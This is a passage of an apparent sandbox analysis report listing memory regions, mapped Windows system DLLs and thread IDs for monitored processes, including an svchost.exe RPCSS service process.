entry_point = 0x0 region_type = private name = "private_0x0000000001100000" filename = "" Region: id = 2058 start_va = 0x1100000 end_va = 0x117ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001100000" filename = "" Region: id = 2059 start_va = 0x11d0000 end_va = 0x124ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000011d0000" filename = "" Region: id = 2060 start_va = 0x1310000 end_va = 0x138ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001310000" filename = "" Region: id = 2061 start_va = 0x7fffffa8000 end_va = 0x7fffffa9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffa8000" filename = "" Region: id = 2062 start_va = 0x7fffffaa000 end_va = 0x7fffffabfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffaa000" filename = "" Region: id = 2063 start_va = 0x7fefcbe0000 end_va = 0x7fefcc0bfff monitored = 0 entry_point = 0x7fefcbe15c4 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 2064 start_va = 0x5e0000 end_va = 0x65ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005e0000" filename = "" Region: id = 2065 start_va = 0x7fffffa6000 end_va = 0x7fffffa7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffa6000" filename = "" Region: id = 2066 start_va = 0x7fefcbb0000 end_va = 0x7fefcbdbfff monitored = 0 entry_point = 0x7fefcbb15c4 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 2067 start_va = 0x7fefcbe0000 end_va = 0x7fefcc0bfff monitored = 0 entry_point = 0x7fefcbe15c4 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 2068 start_va = 0x7fefcbb0000 end_va = 0x7fefcbdbfff monitored = 0 entry_point = 0x7fefcbb15c4 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 2069 start_va = 0x7fefcbe0000 end_va = 0x7fefcc0bfff monitored = 0 entry_point = 0x7fefcbe15c4 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 2070 start_va = 0x7fefcbb0000 end_va = 0x7fefcbdbfff monitored = 0 entry_point = 0x7fefcbb15c4 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 2071 start_va = 0x7fefcbe0000 end_va = 0x7fefcc0bfff monitored = 0 entry_point = 0x7fefcbe15c4 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 2072 start_va = 0x7fefcbb0000 end_va = 0x7fefcbdbfff monitored = 0 entry_point = 0x7fefcbb15c4 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 2073 start_va = 0x7fefcbe0000 end_va = 0x7fefcc0bfff monitored = 0 entry_point = 0x7fefcbe15c4 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 2074 start_va = 0x7fefcbb0000 end_va = 0x7fefcbdbfff monitored = 0 entry_point = 0x7fefcbb15c4 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 2075 start_va = 0x7fefcbe0000 end_va = 0x7fefcc0bfff monitored = 0 entry_point = 0x7fefcbe15c4 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 2079 start_va = 0x1400000 end_va = 0x147ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001400000" filename = "" Region: id = 2080 start_va = 0x7fffffa4000 end_va = 0x7fffffa5fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffa4000" filename = "" Region: id = 2081 start_va = 0x7fefcb80000 end_va = 0x7fefcc00fff monitored = 0 entry_point = 0x7fefcb8cec8 region_type = mapped_file name = "rpcss.dll" filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll") Region: id = 2082 start_va = 0x7fefd780000 end_va = 0x7fefd7a4fff monitored = 0 entry_point = 0x7fefd789658 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 2095 start_va = 0x1570000 end_va = 0x15effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001570000" filename = "" Region: id = 2096 start_va = 0x7fffffa2000 end_va = 0x7fffffa3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffa2000" filename = "" Region: id = 2097 start_va = 0x7fefd1b0000 end_va = 0x7fefd1c7fff monitored = 0 entry_point = 0x7fefd1b3b48 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 2098 start_va = 0x7fefcd80000 end_va = 0x7fefcd89fff monitored = 0 entry_point = 0x7fefcd83cb8 region_type = mapped_file name = "credssp.dll" filename = "\\Windows\\System32\\credssp.dll" (normalized: "c:\\windows\\system32\\credssp.dll") Region: id = 2099 start_va = 0x1f0000 end_va = 0x1f0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001f0000" filename = "" Region: id = 2835 start_va = 0x200000 end_va = 0x200fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000200000" filename = "" Region: id = 2836 start_va = 0x1440000 end_va = 0x14bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001440000" filename = "" Region: id = 2837 start_va = 0x1640000 end_va = 0x16bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001640000" filename = "" Region: id = 2838 start_va = 0x1700000 end_va = 0x177ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001700000" filename = "" Region: id = 2839 start_va = 0x7fffff9e000 end_va = 0x7fffff9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff9e000" filename = "" Region: id = 2840 start_va = 0x7fffffa0000 end_va = 0x7fffffa1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffa0000" filename = "" Region: id = 2913 start_va = 0x460000 end_va = 0x460fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 2914 start_va = 0x7feffbe0000 end_va = 0x7feffc78fff monitored = 0 entry_point = 0x7feffbe1c10 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 2915 start_va = 0x470000 end_va = 0x470fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 3274 start_va = 0xff6a0000 end_va = 0xff6a6fff monitored = 0 entry_point = 0xff6a124c region_type = mapped_file name = "dllhost.exe" filename = "\\Windows\\System32\\dllhost.exe" (normalized: "c:\\windows\\system32\\dllhost.exe") Region: id = 4252 start_va = 0xcc0000 end_va = 0xd3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000cc0000" filename = "" Region: id = 4253 start_va = 0x1780000 end_va = 0x187ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001780000" filename = "" Region: id = 4254 start_va = 0x7fffffd3000 end_va = 0x7fffffd4fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd3000" filename = "" Region: id = 4255 start_va = 0x7fefbe60000 end_va = 0x7fefbe8cfff monitored = 0 entry_point = 0x7fefbe61010 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll") Region: id = 4256 start_va = 0x7feff810000 end_va = 0x7feff861fff monitored = 0 entry_point = 0x7feff8110d4 region_type = mapped_file name = "wldap32.dll" filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll") Region: id = 4262 start_va = 0x480000 end_va = 0x480fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000480000" filename = "" Region: id = 4273 start_va = 0x7fef8530000 end_va = 0x7fef8561fff monitored = 0 entry_point = 0x7fef854ca90 region_type = mapped_file name = "wmidcprv.dll" filename = "\\Windows\\System32\\wbem\\WmiDcPrv.dll" (normalized: "c:\\windows\\system32\\wbem\\wmidcprv.dll") Region: id = 4286 start_va = 0x7fef82c0000 end_va = 0x7fef8392fff monitored = 0 entry_point = 0x7fef8338b00 region_type = mapped_file name = "fastprox.dll" filename = "\\Windows\\System32\\wbem\\fastprox.dll" (normalized: "c:\\windows\\system32\\wbem\\fastprox.dll") Region: id = 4293 start_va = 0x7fef8ae0000 end_va = 0x7fef8b56fff monitored = 0 entry_point = 0x7fef8b1e7f0 region_type = mapped_file name = "wbemcomn2.dll" filename = "\\Windows\\System32\\wbemcomn2.dll" (normalized: "c:\\windows\\system32\\wbemcomn2.dll") Region: id = 4294 start_va = 0x7fefd330000 end_va = 0x7fefd351fff monitored = 0 entry_point = 0x7fefd335d30 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 4295 start_va = 0x7feff880000 end_va = 0x7feff8ccfff monitored = 0 entry_point = 0x7feff881070 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 4296 start_va = 0x7feff870000 end_va = 0x7feff877fff monitored = 0 entry_point = 0x7feff871504 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 4297 start_va = 0x7fef8240000 end_va = 0x7fef8266fff monitored = 0 entry_point = 0x7fef82411a0 region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll") Region: id = 4342 start_va = 0x7fef8180000 end_va = 0x7fef818dfff monitored = 0 entry_point = 0x7fef8185500 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\System32\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemprox.dll") Region: id = 4345 start_va = 0x7fefd1b0000 end_va = 0x7fefd1c7fff monitored = 0 entry_point = 0x7fefd1b3b48 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 4346 start_va = 0xc60000 end_va = 0xca4fff monitored = 0 entry_point = 0xc61064 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 4347 start_va = 0xc60000 end_va = 0xca4fff monitored = 0 entry_point = 0xc61064 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 4348 start_va = 0xc60000 end_va = 0xca4fff monitored = 0 entry_point = 0xc61064 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 4349 start_va = 0xc60000 end_va = 0xca4fff monitored = 0 entry_point = 0xc61064 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 4350 start_va = 0xc60000 end_va = 0xca4fff monitored = 0 entry_point = 0xc61064 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 4351 start_va = 0x7fefceb0000 end_va = 0x7fefcef6fff monitored = 0 entry_point = 0x7fefceb1064 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 4424 start_va = 0x1950000 end_va = 0x19cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001950000" filename = "" Region: id = 4425 start_va = 0x7fffff9c000 end_va = 0x7fffff9dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff9c000" filename = "" Region: id = 4426 start_va = 0x7fef7c40000 end_va = 0x7fef7c52fff monitored = 0 entry_point = 0x7fef7c41d80 region_type = mapped_file name = "wbemsvc.dll" filename = "\\Windows\\System32\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemsvc.dll") Thread: id = 264 os_tid = 0x230 Thread: id = 265 os_tid = 0x234 Thread: id = 266 os_tid = 0x238 Thread: id = 267 os_tid = 0x23c Thread: id = 268 os_tid = 0x240 Thread: id = 269 os_tid = 0x244 Thread: id = 270 os_tid = 0x248 Thread: id = 271 os_tid = 0x24c Thread: id = 272 os_tid = 0x250 Thread: id = 273 os_tid = 0x254 Thread: id = 274 os_tid = 0x258 Thread: id = 275 os_tid = 0x25c Thread: id = 277 os_tid = 0x268 Thread: id = 279 os_tid = 0x274 Thread: id = 280 os_tid = 0x278 Thread: id = 281 os_tid = 0x27c Thread: id = 324 os_tid = 0x368 Thread: id = 469 os_tid = 0x580 Thread: id = 484 os_tid = 0x5bc Process: id = "9" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x2906e000" os_pid = "0x26c" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "7" os_parent_pid = "0x1c0" cmd_line = "C:\\Windows\\system32\\svchost.exe -k RPCSS" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Network Service" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\RpcEptMapper" [0xe], "NT SERVICE\\RpcSs" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000c78a" [0xc000000f], "LOCAL" [0x7] Region: id = 2083 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 2084 start_va = 0x30000 end_va = 0x33fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 2085 start_va = 0x210000 end_va = 0x28ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 2086 start_va = 0x77970000 end_va = 0x77b18fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2087 start_va = 0x7efe0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 2088 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2089 start_va = 0xffce0000 end_va = 0xffceafff monitored = 0 entry_point = 0xffce246c region_type = mapped_file name = "svchost.exe" filename = "\\Windows\\System32\\svchost.exe" (normalized: "c:\\windows\\system32\\svchost.exe") Region: id = 2090 start_va = 0x7feffc90000 end_va = 0x7feffc90fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 2091 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 2092 start_va = 0x7fffffdc000 end_va = 0x7fffffddfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffdc000" filename = "" Region: id = 2093 start_va = 0x7fffffde000 end_va = 0x7fffffdefff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 2094 start_va = 0x40000 end_va = 0x40fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 2100 start_va = 0x3a0000 end_va = 0x49ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000003a0000" filename = "" Region: id = 2101 start_va = 0x77750000 end_va = 0x7786efff monitored = 0 entry_point = 0x77765340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 2102 start_va = 0x7fefd9d0000 end_va = 0x7fefda3bfff monitored = 0 entry_point = 0x7fefd9d2780 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 2103 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 2104 start_va = 0x7efe0000 end_va = 0x7f0dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 2105 start_va = 0x7f0e0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 2106 start_va = 0x50000 end_va = 0xb6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2107 start_va = 0x7feff500000 end_va = 0x7feff59efff monitored = 0 entry_point = 0x7feff5025a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 2108 start_va = 0x7feff7f0000 end_va = 0x7feff80efff monitored = 0 entry_point = 0x7feff7f60e8 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 2109 start_va = 0x7feff6c0000 end_va = 0x7feff7ecfff monitored = 0 entry_point = 0x7feff70ed50 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 2110 start_va = 0x4a0000 end_va = 0x68ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004a0000" filename = "" Region: id = 2111 start_va = 0xc0000 end_va = 0x1bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000c0000" filename = "" Region: id = 2112 start_va = 0x560000 end_va = 0x5dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000560000" filename = "" Region: id = 2113 start_va = 0x680000 end_va = 0x68ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000680000" filename = "" Region: id = 2114 start_va = 0x7fffffda000 end_va = 0x7fffffdbfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffda000" filename = "" Region: id = 2115 start_va = 0x310000 end_va = 0x38ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000310000" filename = "" Region: id = 2116 start_va = 0x7a0000 end_va = 0x81ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007a0000" filename = "" Region: id = 2117 start_va = 0x820000 end_va = 0xaeefff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 2118 start_va = 0x7fffffd6000 end_va = 0x7fffffd7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd6000" filename = "" Region: id = 2119 start_va = 0x7fffffd8000 end_va = 0x7fffffd9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd8000" filename = "" Region: id = 2120 start_va = 0x7fefcb60000 end_va = 0x7fefcb73fff monitored = 0 entry_point = 0x7fefcb6101c region_type = mapped_file name = "rpcepmap.dll" filename = "\\Windows\\System32\\RpcEpMap.dll" (normalized: "c:\\windows\\system32\\rpcepmap.dll") Region: id = 2121 start_va = 0x7fefd860000 end_va = 0x7fefd873fff monitored = 0 entry_point = 0x7fefd8610e0 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 2122 start_va = 0x7fefd460000 end_va = 0x7fefd46afff monitored = 0 entry_point = 0x7fefd461030 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll") Region: id = 2123 start_va = 0x7fefd780000 end_va = 0x7fefd7a4fff monitored = 0 entry_point = 0x7fefd789658 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 2124 start_va = 0x7fefd1b0000 end_va = 0x7fefd1c7fff monitored = 0 entry_point = 0x7fefd1b3b48 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 2125 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 2126 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 2127 start_va = 0x7fefcd80000 end_va = 0x7fefcd89fff monitored = 0 entry_point = 0x7fefcd83cb8 region_type = mapped_file name = "credssp.dll" filename = "\\Windows\\System32\\credssp.dll" (normalized: "c:\\windows\\system32\\credssp.dll") Region: id = 2128 start_va = 0x7fefd7b0000 end_va = 0x7fefd7befff monitored = 0 entry_point = 0x7fefd7b1010 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 2129 start_va = 0x6e0000 end_va = 0x75ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006e0000" filename = "" Region: id = 2130 start_va = 0x7fffffd4000 end_va = 0x7fffffd5fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd4000" filename = "" Region: id = 2131 start_va = 0x4b0000 end_va = 0x52ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 2132 start_va = 0x7fffffae000 end_va = 0x7fffffaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffae000" filename = "" Region: id = 2133 start_va = 0xba0000 end_va = 0xc1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000ba0000" filename = "" Region: id = 2134 start_va = 0x7fefcb80000 end_va = 0x7fefcc00fff monitored = 0 entry_point = 0x7fefcb8cec8 region_type = mapped_file name = "rpcss.dll" filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll") Region: id = 2135 start_va = 0xcf0000 end_va = 0xd6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000cf0000" filename = "" Region: id = 2136 start_va = 0x7feff0c0000 end_va = 0x7feff19afff monitored = 0 entry_point = 0x7feff0e0760 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 2137 start_va = 0x7fffffac000 end_va = 0x7fffffadfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffac000" filename = "" Region: id = 2138 start_va = 0x7fefd1b0000 end_va = 0x7fefd1c7fff monitored = 0 entry_point = 0x7fefd1b3b48 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 2139 start_va = 0x1c0000 end_va = 0x204fff monitored = 0 entry_point = 0x1c1064 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 2140 start_va = 0x1c0000 end_va = 0x204fff monitored = 0 entry_point = 0x1c1064 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 2141 start_va = 0x1c0000 end_va = 0x204fff monitored = 0 entry_point = 0x1c1064 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 2142 start_va = 0x1c0000 end_va = 0x204fff monitored = 0 entry_point = 0x1c1064 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 2143 start_va = 0x1c0000 end_va = 0x204fff monitored = 0 entry_point = 0x1c1064 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 2144 start_va = 0x7fefceb0000 end_va = 0x7fefcef6fff monitored = 0 entry_point = 0x7fefceb1064 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 2145 start_va = 0x7feff880000 end_va = 0x7feff8ccfff monitored = 0 entry_point = 0x7feff881070 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 2146 start_va = 0x7feff870000 end_va = 0x7feff877fff monitored = 0 entry_point = 0x7feff871504 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 2147 start_va = 0x7fefd150000 end_va = 0x7fefd1a4fff monitored = 0 entry_point = 0x7fefd151054 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 2148 start_va = 0x77870000 end_va = 0x77969fff monitored = 0 entry_point = 0x7788a2c8 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 2149 start_va = 0x7feff010000 end_va = 0x7feff076fff monitored = 0 entry_point = 0x7feff01b03c region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 2150 start_va = 0x7feff080000 end_va = 0x7feff08dfff monitored = 0 entry_point = 0x7feff081080 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 2151 start_va = 0x7fefdc90000 end_va = 0x7fefdd58fff monitored = 0 entry_point = 0x7fefdd0a874 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 2152 start_va = 0x1c0000 end_va = 0x1e8fff monitored = 0 entry_point = 0x1c1010 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 2153 start_va = 0xd70000 end_va = 0xef7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000d70000" filename = "" Region: id = 2154 start_va = 0x1c0000 end_va = 0x1e8fff monitored = 0 entry_point = 0x1c1010 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 2155 start_va = 0x7feff090000 end_va = 0x7feff0bdfff monitored = 0 entry_point = 0x7feff091010 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 2156 start_va = 0x7feff950000 end_va = 0x7feffa58fff monitored = 0 entry_point = 0x7feff951064 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 2157 start_va = 0x760000 end_va = 0x81ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000760000" filename = "" Region: id = 2158 start_va = 0xf00000 end_va = 0x1080fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000f00000" filename = "" Region: id = 2159 start_va = 0x20000 end_va = 0x20fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "svchost.exe.mui" filename = "\\Windows\\System32\\en-US\\svchost.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\svchost.exe.mui") Region: id = 2160 start_va = 0x1c0000 end_va = 0x1c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = 